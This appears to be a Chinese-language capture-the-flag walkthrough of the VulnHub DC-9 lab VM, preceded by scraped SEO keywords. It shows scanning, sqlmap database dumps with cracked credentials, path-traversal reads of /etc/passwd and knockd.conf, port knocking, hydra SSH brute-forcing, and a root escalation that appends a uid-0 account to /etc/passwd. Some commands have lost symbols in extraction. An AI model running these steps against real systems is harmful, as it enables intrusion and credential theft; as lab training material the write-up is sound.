微信群 网站建设,sem网络推广公司,开发软件学什么专业,龙岗公司网站文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 DC-9下载地址#xff1a;https://download.vulnhub.com/dc/DC-9.zip kali#xff1a;192.168.144.148 DC-9#xff1a;192.168.144.158 二、渗透流程 1、信息收集nmap -T5 -A -p- -sV -sT 192.168.144.158思路https://download.vulnhub.com/dc/DC-9.zip kali192.168.144.148 DC-9192.168.144.158 二、渗透流程
1、信息收集nmap -T5 -A -p- -sV -sT 192.168.144.158思路 1、80端口 目录扫描dirb、gobuster、dirsearch等工具 web站点资产识别goby、whatweb等 web站点功能页面 分析网页源代码 …… 2、22端口 ssh爆破、有账号密码信息进行远程登录 …… 3、目录扫描、指纹识别 结果暂无有用信息对页面功能点进行检查 目录扫描dirsearch -u http://192.168.144.158 指纹识别whatweb http://102.168.144.158 2、漏洞探测2.1、SQL注入 1.爆数据库
方法1sqlmap -r 1.txt --dbs #抓包POST注入
方法2sqlmap -u http://192.168.144.158/results.php --data search1 --dbs2.爆Staff数据库的表
方法1sqlmap -u http://192.168.144.158/results.php --data search1 -D Staff --tables
方法2sqlmap -r 1.txt -D Staff --tables3.爆Users表的字段
方法1sqlmap -u http://192.168.144.158/results.php --data search1 -D Staff -T Users --dump
方法2sqlmap -r 1.txt -D Staff -T Users --dump 4.解密password md5解密地址https://www.somd5.com/ 账号 密码admin transorbital1 5.爆数据库users的表
sqlmap -u http://192.168.144.158/results.php --data search1 -D users --tables
sqlmap -r 1.txt -D users --tables 6.爆UserDetails表的字段
sqlmap -u http://192.168.144.158/results.php --data search1 -D users -T UserDetails --dump
sqlmap -r 1.txt -D users -T UserDetails --dump思路 1、获取到admin账号和密码登录后台 2、users数据库爆破出的账号密码暂时无用。 2.2、文件包含
1.登录后台
文件包含线索:1.页面显示File does not exist2.目录爆破的时候发现include目录。 2./etc/password
wfuzz -b PHPSESSIDjto9ulf88r04ds3570qb4sfl4b --hw 100 -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.144.158/manage.php?FUZZ../../../../../../../../../etc/passwd访问http://192.168.144.158/manage.php?file../../../../../../../../../etc/passwd 2.3、连接SSH
1.利用UserDetails表的字段爆破ssh账号密码 hydra -L user-dict -P pass-dict 192.168.144.158 ssh思路 1、用户被限制登录 2、运行了knockd服务 3、端口被限制防火墙 2.访问敲门服务配置文件knockd.conf http://192.168.144.158/manage.php?file…/…/…/…/…/…/…/…/…/…/etc/knockd.conf 3.利用nmap进行敲门 4.22端口开启 5.再次爆破ssh账密 hydra -L user-dict -P pass-dict 192.168.144.158 ssh爆破出有3个用户chandlerb UrAG0D!、joeyt Passw0rd、janitor Ilovepeepee 6.ssh连接 ssh chandlerb192.168.144.158 ssh joeyt192.168.144.158 ssh janitor192.168.144.158
发现新的密码文件
结合之前获取到的账号再次进行爆破 得到用户fredf B4-Tru3-001 使用账密登录sshssh fredf192.168.144.158 3、权限发现无需密码就可以以root权限执行的文件
sudo -l查看test文件发现其为乱码
./test查看文件用法 usagetest.py文件的读和追加。
查找test.py文件
find / -name test.py 2/dev/null
cat /opt/devstuff/test.pymd5加盐加密 openssl passwd -1 -salt testDC9 123456-1 的意思是使用md5加密算法 -salt 自动插入一个随机数作为文件内容加密 写入/tmp临时目录下
echo testDC9:$1$testDC9$7DqifpbKzKYKpgnH4SUlz.:0:0::/root:/bin/bash /tmp/passwd在root权限的目录下运行test程序 cd /opt/devstuff/dist/test/sudo ./test /tmp/passwd /etc/passwdsu testDC9查看flag 三、思路总结
1、信息收集22和80端口
2、web站点发现sql注入和文件包含
3、利用sql注入获取到账号密码登录后台
4、利用文件包含查看敲门服务配置文件knockd.conf
5、ssh连接查看文件
6、寻找可以root权限执行的文件
7、写入用户以root身份运行。